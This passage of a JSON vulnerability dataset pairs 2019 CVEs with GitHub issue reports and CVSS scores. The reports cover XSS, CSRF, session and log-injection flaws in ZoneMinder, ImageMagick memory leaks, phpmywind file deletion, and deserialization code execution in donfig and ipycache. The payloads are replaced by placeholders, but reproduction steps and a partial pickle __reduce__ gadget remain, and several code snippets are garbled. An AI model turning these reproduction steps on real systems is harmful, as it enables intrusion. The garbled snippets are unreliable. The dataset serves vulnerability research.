43831. "description": "Self Stored Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view log , insecurely prints the Log Message value on the webpage without applying any proper filtration, leading to XSS. Example An attacker can entice the victim to visit a non-existing view (using an XSS payload instead of a valid view); the non-existing view name will be reflected back in the logs, thereby triggering the XSS payload when the logs view is opened. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to any URL which reflects back the user supplied input into the logs view ( URLTAG Navigate to the affected link, payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43832. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43833. "severity": "MEDIUM",
  43834. "baseScore": 6.1,
  43835. "impactScore": 2.7,
  43836. "exploitabilityScore": 2.8
  43837. },
  43838. {
  43839. "CVE_ID": "CVE-2019-7336",
  43840. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2457",
  43841. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2457",
  43842. "Repo_new": "zoneminder/zoneminder",
  43843. "Issue_Created_At": "2019-01-24T20:09:34Z",
  43844. "description": "Self Stored Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Multiple views include the view APITAG , being the file where the vulnerable code exists. The view APITAG contains a filter form, where it takes in input from the user & saves it into the session, in order to preserve & retrieve it later (insecurely). The value of APITAG & Source parameter are being displayed without any output filtration being applied. To Reproduce Multiple Views FILETAG example ) Affected URL : URLTAG \"> APITAG APITAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43845. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43846. "severity": "MEDIUM",
  43847. "baseScore": 6.1,
  43848. "impactScore": 2.7,
  43849. "exploitabilityScore": 2.8
  43850. },
  43851. {
  43852. "CVE_ID": "CVE-2019-7337",
  43853. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2456",
  43854. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2456",
  43855. "Repo_new": "zoneminder/zoneminder",
  43856. "Issue_Created_At": "2019-01-24T20:03:05Z",
  43857. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view events , insecurely displays the limit parameter value, without applying any proper output filtration leading to XSS. This issue exists because of function APITAG in ERRORTAG which insecurely returns the value of limit query string parameter without applying any filtration. To Reproduce Affected URL : URLTAG \"> APITAG &page NUMBERTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43858. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43859. "severity": "MEDIUM",
  43860. "baseScore": 4.8,
  43861. "impactScore": 2.7,
  43862. "exploitabilityScore": 1.7
  43863. },
  43864. {
  43865. "CVE_ID": "CVE-2019-7338",
  43866. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2454",
  43867. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2454",
  43868. "Repo_new": "zoneminder/zoneminder",
  43869. "Issue_Created_At": "2019-01-24T19:56:02Z",
43870. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view group , insecurely displays the Group name , that is without applying any proper output filtration, leading to XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the Affected URL, Inject the XSS payload into the Name field (window will be closed). Now on the current window, click on the group name, popup will be opened & XSS payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43871. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43872. "severity": "MEDIUM",
  43873. "baseScore": 6.1,
  43874. "impactScore": 2.7,
  43875. "exploitabilityScore": 2.8
  43876. },
  43877. {
  43878. "CVE_ID": "CVE-2019-7340",
  43879. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2462",
  43880. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2462",
  43881. "Repo_new": "zoneminder/zoneminder",
  43882. "Issue_Created_At": "2019-01-24T20:39:09Z",
  43883. "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the APITAG parameter value, without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43884. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43885. "severity": "MEDIUM",
  43886. "baseScore": 6.1,
  43887. "impactScore": 2.7,
  43888. "exploitabilityScore": 2.8
  43889. },
  43890. {
  43891. "CVE_ID": "CVE-2019-7341",
  43892. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2463",
  43893. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2463",
  43894. "Repo_new": "zoneminder/zoneminder",
  43895. "Issue_Created_At": "2019-01-24T20:50:25Z",
  43896. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43898. "severity": "MEDIUM",
  43899. "baseScore": 6.1,
  43900. "impactScore": 2.7,
  43901. "exploitabilityScore": 2.8
  43902. },
  43903. {
  43904. "CVE_ID": "CVE-2019-7342",
  43905. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2461",
  43906. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2461",
  43907. "Repo_new": "zoneminder/zoneminder",
  43908. "Issue_Created_At": "2019-01-24T20:33:09Z",
  43909. "description": "POST Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the APITAG parameter value, without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG POST Data CODETAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43910. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43911. "severity": "MEDIUM",
  43912. "baseScore": 6.1,
  43913. "impactScore": 2.7,
  43914. "exploitabilityScore": 2.8
  43915. },
  43916. {
  43917. "CVE_ID": "CVE-2019-7343",
  43918. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2464",
  43919. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2464",
  43920. "Repo_new": "zoneminder/zoneminder",
  43921. "Issue_Created_At": "2019-01-24T20:55:16Z",
  43922. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43923. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43924. "severity": "MEDIUM",
  43925. "baseScore": 6.1,
  43926. "impactScore": 2.7,
  43927. "exploitabilityScore": 2.8
  43928. },
  43929. {
  43930. "CVE_ID": "CVE-2019-7344",
  43931. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2455",
  43932. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2455",
  43933. "Repo_new": "zoneminder/zoneminder",
  43934. "Issue_Created_At": "2019-01-24T19:59:50Z",
  43935. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view filter , insecurely displays the Filter name , without applying any proper output filtration leading to XSS. To Reproduce Affected URL : URLTAG \"> APITAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43936. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43937. "severity": "MEDIUM",
  43938. "baseScore": 6.1,
  43939. "impactScore": 2.7,
  43940. "exploitabilityScore": 2.8
  43941. },
  43942. {
  43943. "CVE_ID": "CVE-2019-7345",
  43944. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2468",
  43945. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2468",
  43946. "Repo_new": "zoneminder/zoneminder",
  43947. "Issue_Created_At": "2019-01-24T21:25:49Z",
43948. "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view options , does no input validation on the value supplied to the APITAG , APITAG , APITAG , APITAG fields & processes it further, storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, APITAG , APITAG , APITAG , APITAG will be set with the Payload & get triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43949. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43950. "severity": "MEDIUM",
  43951. "baseScore": 4.8,
  43952. "impactScore": 2.7,
  43953. "exploitabilityScore": 1.7
  43954. },
  43955. {
  43956. "CVE_ID": "CVE-2019-7346",
  43957. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2469",
  43958. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2469",
  43959. "Repo_new": "zoneminder/zoneminder",
  43960. "Issue_Created_At": "2019-01-24T21:36:28Z",
43961. "description": "Weak Cross Site Request Forgery (CSRF) Protection . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Try again button in callback function Whenever a CSRF check fails, a callback function is called displaying a failure message. Unfortunately there also exists an APITAG again\" button on the page, which allows the failed request to be resent and accepted, making the attack successful. To Reproduce APITAG Expected behavior This allows an attacker to easily carry out the CSRF attack. Normally users are not technical enough to understand what a CSRF failure message is & would generally click on APITAG Again\", themselves making the attack successful. Debug Logs None",
  43962. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43963. "severity": "HIGH",
  43964. "baseScore": 8.8,
  43965. "impactScore": 5.9,
  43966. "exploitabilityScore": 2.8
  43967. },
  43968. {
  43969. "CVE_ID": "CVE-2019-7347",
  43970. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2476",
  43971. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2476",
  43972. "Repo_new": "zoneminder/zoneminder",
  43973. "Issue_Created_At": "2019-01-25T03:01:24Z",
43974. "description": "Time of check Time of use (TOCTOU) Race Condition . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Time of check, time of use race conditions occur when a resource is checked for a particular value, that value is changed, then the resource is used, based on the assumption that the value is still the same as it was at check time. To Reproduce The session remains active for an authenticated user even after the user is deleted from the users table, leading to a Time of check Time of use (TOCTOU) Race Condition. This can allow a non-existing user to access & modify accessible records APITAG APITAG etc). Affected URL : FILETAG APITAG access) Navigate to the users page and APITAG New User\" from the users tab and assign any privileges. Delete the newly added user. The deleted user can still access the interface & perform the operations allowed to it. An attacker can gain access to otherwise unauthorized resources and modify, delete or update application data. APITAG APITAG APITAG Expected behavior Destroy the user's session once the user's record is deleted from the database (or re-validate the user against the database on each request). Debug Logs None",
  43975. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  43976. "severity": "HIGH",
  43977. "baseScore": 7.5,
  43978. "impactScore": 5.9,
  43979. "exploitabilityScore": 1.6
  43980. },
  43981. {
  43982. "CVE_ID": "CVE-2019-7348",
  43983. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2467",
  43984. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2467",
  43985. "Repo_new": "zoneminder/zoneminder",
  43986. "Issue_Created_At": "2019-01-24T21:19:53Z",
  43987. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view user , does no input validation to the value supplied to username field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, APITAG , APITAG , APITAG , APITAG will be set with the Payload & get triggered APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43988. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43989. "severity": "MEDIUM",
  43990. "baseScore": 6.1,
  43991. "impactScore": 2.7,
  43992. "exploitabilityScore": 2.8
  43993. },
  43994. {
  43995. "CVE_ID": "CVE-2019-7349",
  43996. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2465",
  43997. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2465",
  43998. "Repo_new": "zoneminder/zoneminder",
  43999. "Issue_Created_At": "2019-01-24T20:59:00Z",
  44000. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view monitor , insecurely prints the APITAG value on the webpage, without applying any proper filtration, leading to Reflected XSS. To Reproduce Affected URL : FILETAG POST Data ERRORTAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  44001. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44002. "severity": "MEDIUM",
  44003. "baseScore": 6.1,
  44004. "impactScore": 2.7,
  44005. "exploitabilityScore": 2.8
  44006. },
  44007. {
  44008. "CVE_ID": "CVE-2019-7350",
  44009. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2471",
  44010. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2471",
  44011. "Repo_new": "zoneminder/zoneminder",
  44012. "Issue_Created_At": "2019-01-24T21:49:38Z",
  44013. "description": "Improper Session Management Session Fixation. Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug Before any response being rendered on the web page, a cookie is being set as part of response via Set Cookie APITAG due to improper implementation, multiple cookies NUMBERTAG are being set when a user successfully logs in, which isn't an expected APITAG when the next user logs into the application using the same browser, the last user's last cookie is being set as the present user's first cookie. To Reproduce Login into the application, capture the response APITAG HTTP header addon for firefox) Multiple Set Cookie headers will be present in the response Exploitation Actors User A APITAG User B APITAG NUMBERTAG User B logs into the application, captures his own Cookies & logs out. User B's cookie : Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG APITAG NUMBERTAG User A Uses the same browser & log into the application. User A's cookie Set Cookie: APITAG path=/; APITAG APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG Set Cookie: APITAG path=/; APITAG NUMBERTAG User B uses User A's Last cookie to hijack the User B's session (locally/remotely) Expected behavior Only set a single cookie for the user & invalidate it once the user logs out of the application. Debug Logs None",
  44014. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
  44015. "severity": "HIGH",
  44016. "baseScore": 7.3,
  44017. "impactScore": 5.2,
  44018. "exploitabilityScore": 2.1
  44019. },
  44020. {
  44021. "CVE_ID": "CVE-2019-7351",
  44022. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2466",
  44023. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2466",
  44024. "Repo_new": "zoneminder/zoneminder",
  44025. "Issue_Created_At": "2019-01-24T21:05:23Z",
  44026. "description": "Log Injection. Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non repudiation and incident forensics capability Most components of APITAG can emit informational, warning, error and debug messages in a standard format. These messages can be logged in.. Example of these messages is: APITAG The first part refers to the date and time of the entry, the next section is the name (or an abbreviated version) of the script, followed by the process id in square brackets, a severity code (INF, WAR, ERR or DBG) and the debug text. All the mentioned information can be manipulated & injected by an attacker by enticing the victim to visit a specially crafted link, which in turn will inject a custom Log message provided by the attacker. The same will be reflected in the Log view page To Reproduce Affected URL : FILETAG POST Data CODETAG Navigate to the Affected URL, Custom Log will be injected. Navigate to the URLTAG Log will be visible. APITAG Expected behavior Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data. Debug Logs None",
  44027. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  44028. "severity": "MEDIUM",
  44029. "baseScore": 6.5,
  44030. "impactScore": 3.6,
  44031. "exploitabilityScore": 2.8
  44032. },
  44033. {
  44034. "CVE_ID": "CVE-2019-7352",
  44035. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2475",
  44036. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2475",
  44037. "Repo_new": "zoneminder/zoneminder",
  44038. "Issue_Created_At": "2019-01-24T22:15:13Z",
  44039. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view Run State , does no input validation to the value supplied to New State field & processes it further storing the value into the database without any prior filtration, leading to stored XSS. To Reproduce Affected URL : FILETAG POST Data APITAG Payload used APITAG Navigate to the Affected URL and set value of New State with payload Click on Download and Payload would be triggered. APITAG APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  44040. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44041. "severity": "MEDIUM",
  44042. "baseScore": 6.1,
  44043. "impactScore": 2.7,
  44044. "exploitabilityScore": 2.8
  44045. },
  44046. {
  44047. "CVE_ID": "CVE-2019-7395",
  44048. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1451",
  44049. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1451",
  44050. "Repo_new": "imagemagick/imagemagick",
  44051. "Issue_Created_At": "2019-01-17T03:11:55Z",
  44052. "description": "memory leak in APITAG in coders/psd.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/psd.c Steps to Reproduce APITAG quality NUMBERTAG image_info >quality APITAG quality; if APITAG != Z_OK) //line NUMBERTAG APITAG return NUMBERTAG line NUMBERTAG ERRORTAG c if APITAG != Z_OK) //line NUMBERTAG APITAG + compressed_pixels=(unsigned char ) APITAG + compressed_pixels); return NUMBERTAG System Configuration APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  44053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44054. "severity": "HIGH",
  44055. "baseScore": 7.5,
  44056. "impactScore": 3.6,
  44057. "exploitabilityScore": 3.9
  44058. },
  44059. {
  44060. "CVE_ID": "CVE-2019-7396",
  44061. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1452",
  44062. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1452",
  44063. "Repo_new": "imagemagick/imagemagick",
  44064. "Issue_Created_At": "2019-01-17T04:06:51Z",
  44065. "description": "Potential Memory Leak in APITAG in coders/sixel.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG potential memory leak in APITAG in sixel.c Steps to Reproduce APITAG max_x || imsy > max_y) { // line NUMBERTAG dmsx = max_x; dmsy = max_y; if APITAG == APITAG { imbuf = (unsigned char ) APITAG return APITAG } if ((dmbuf = (unsigned char ) APITAG , dmsy)) == NULL) { //line NUMBERTAG imbuf = (unsigned char ) APITAG return APITAG } for (y NUMBERTAG y APITAG columns,&image >rows,&sixel_palette,&image >colors,exception) == APITAG // line NUMBERTAG sixel_buffer=(char ) APITAG ERRORTAG } sixel_buffer=(char ) APITAG image >depth NUMBERTAG image APITAG APITAG >columns,image >rows,exception); if (status == APITAG { sixel_pixels=(unsigned char ) APITAG // line NUMBERTAG sixel_palette=(unsigned char ) APITAG APITAG } ERRORTAG c if (sixel_decode(image,(unsigned char ) APITAG >columns,&image >rows,&sixel_palette,&image >colors,exception) == APITAG { sixel_buffer=(char ) APITAG + sixel_pixels=(unsigned char ) APITAG ERRORTAG } ` System Configuration APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  44066. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44067. "severity": "HIGH",
  44068. "baseScore": 7.5,
  44069. "impactScore": 3.6,
  44070. "exploitabilityScore": 3.9
  44071. },
  44072. {
  44073. "CVE_ID": "CVE-2019-7397",
  44074. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1454",
  44075. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1454",
  44076. "Repo_new": "imagemagick/imagemagick",
  44077. "Issue_Created_At": "2019-01-17T11:10:56Z",
  44078. "description": "Potential Memory Leak in APITAG in coders/pdf.c different from NUMBERTAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Potential memory leak in function APITAG in coders/pdf.c, which is similar to but different from NUMBERTAG Steps to Reproduce APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG S Code Additional information: code review APITAG Credit to Bingchang Liu of VARAS of IIE",
  44079. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44080. "severity": "HIGH",
  44081. "baseScore": 7.5,
  44082. "impactScore": 3.6,
  44083. "exploitabilityScore": 3.9
  44084. },
  44085. {
  44086. "CVE_ID": "CVE-2019-7398",
  44087. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1453",
  44088. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1453",
  44089. "Repo_new": "imagemagick/imagemagick",
  44090. "Issue_Created_At": "2019-01-17T06:50:47Z",
  44091. "description": "Potential Memory Leak in APITAG in coders/dib.c. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/dib.c Steps to Reproduce APITAG compression != APITAG //line NUMBERTAG size_t length; / Convert run length encoded raster pixels. / length NUMBERTAG UL (bytes_per_line NUMBERTAG UL NUMBERTAG UL; dib_data=(unsigned char ) APITAG // line NUMBERTAG image >rows NUMBERTAG UL) sizeof( dib_data)); if (dib_data == (unsigned char ) NULL) { pixels=(unsigned char ) APITAG ERRORTAG } APITAG int) APITAG pixels,dib_data); pixels=(unsigned char ) APITAG pixels=dib_data; // line NUMBERTAG APITAG = BI_RLE8; } APITAG c if (image >storage_class == APITAG //line NUMBERTAG if APITAG APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  44092. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44093. "severity": "HIGH",
  44094. "baseScore": 7.5,
  44095. "impactScore": 3.6,
  44096. "exploitabilityScore": 3.9
  44097. },
  44098. {
  44099. "CVE_ID": "CVE-2019-7402",
  44100. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/8",
  44101. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/8",
  44102. "Repo_new": "panghusec/exploit",
  44103. "Issue_Created_At": "2019-02-05T12:38:18Z",
  44104. "description": "Home Storage XSS based on CSRF. Attackers can get any user's access credentials and do other things APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it APITAG source code FILETAG Did not do any filtering Causing storage xss and CSRF exists at the change QQ number ]( URLTAG APITAG csrf poc. Phishing admin accessing malicious pages ERRORTAG NUMBERTAG Then go back to the home page ![ URLTAG",
  44105. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44106. "severity": "MEDIUM",
  44107. "baseScore": 6.1,
  44108. "impactScore": 2.7,
  44109. "exploitabilityScore": 2.8
  44110. },
  44111. {
  44112. "CVE_ID": "CVE-2019-7403",
  44113. "Issue_Url_old": "https://github.com/panghusec/exploit/issues/9",
  44114. "Issue_Url_new": "https://github.com/panghusec/exploit/issues/9",
  44115. "Repo_new": "panghusec/exploit",
  44116. "Issue_Created_At": "2019-02-05T12:42:54Z",
  44117. "description": "Arbitrary File Delete Vulnerability. Attackers can Delete any file on the system APITAG download the phpmywind the Latest version from FILETAG NUMBERTAG install it NUMBERTAG login as Admin APITAG is a bbb folder under the c drive ]( URLTAG APITAG the URL in the browser FILETAG NUMBERTAG success ![ URLTAG APITAG URLTAG",
  44118. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  44119. "severity": "MEDIUM",
  44120. "baseScore": 4.9,
  44121. "impactScore": 3.6,
  44122. "exploitabilityScore": 1.2
  44123. },
  44124. {
  44125. "CVE_ID": "CVE-2019-7537",
  44126. "Issue_Url_old": "https://github.com/pytroll/donfig/issues/5",
  44127. "Issue_Url_new": "https://github.com/pytroll/donfig/issues/5",
  44128. "Repo_new": "pytroll/donfig",
  44129. "Issue_Created_At": "2019-02-11T02:33:17Z",
  44130. "description": "APITAG method is vulnerable. coding=utf NUMBERTAG import APITAG as test APITAG PATHTAG APITAG Hi, there is a vulnerability in collect_yaml(paths) method in APITAG please see APITAG above. It can execute arbitrary python commands resulting in command execution.",
  44131. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44132. "severity": "CRITICAL",
  44133. "baseScore": 9.8,
  44134. "impactScore": 5.9,
  44135. "exploitabilityScore": 3.9
  44136. },
  44137. {
  44138. "CVE_ID": "CVE-2019-7539",
  44139. "Issue_Url_old": "https://github.com/rossant/ipycache/issues/47",
  44140. "Issue_Url_new": "https://github.com/rossant/ipycache/issues/47",
  44141. "Repo_new": "rossant/ipycache",
  44142. "Issue_Created_At": "2019-02-11T05:43:32Z",
  44143. "description": "APITAG method is vulnerable. import os import pickle import ipycache class Test(object): def __init__(self): self.a NUMBERTAG def __reduce__(self): return APITAG tmpdaa = APITAG with open(\"a APITAG as f: APITAG APITAG APITAG APITAG function with evil data will cause command execution; if an attacker shares evil data on the internet, when a user loads it, it will cause command execution.",
  44144. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44145. "severity": "HIGH",
  44146. "baseScore": 8.8,
  44147. "impactScore": 5.9,
  44148. "exploitabilityScore": 2.8
  44149. },
  44150. {
  44151. "CVE_ID": "CVE-2019-7559",
  44152. "Issue_Url_old": "https://github.com/Boolector/boolector/issues/30",
  44153. "Issue_Url_new": "https://github.com/boolector/boolector/issues/30",
  44154. "Repo_new": "boolector/boolector",
  44155. "Issue_Created_At": "2019-01-15T17:48:48Z",
  44156. "description": "Out of Bounds write in pusht_bfr. While fuzzing boolector, APITAG APITAG this input file APITAG APITAG APITAG was found, which leads to an out of bounds write, according to valgrind. The attached file contains more lines leading to the same crash, the above file contains the minimal version. FILETAG FILETAG FILETAG APITAG APITAG ASAN trace (probably not useful, since it does not find the write) APITAG ERRORTAG APITAG APITAG APITAG Valgrind trace APITAG ERRORTAG APITAG Used version APITAG Steps to reproduce APITAG",
  44157. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44158. "severity": "MEDIUM",
  44159. "baseScore": 5.5,
  44160. "impactScore": 3.6,
  44161. "exploitabilityScore": 1.8
  44162. },
  44163. {
  44164. "CVE_ID": "CVE-2019-7560",
  44165. "Issue_Url_old": "https://github.com/Boolector/boolector/issues/28",
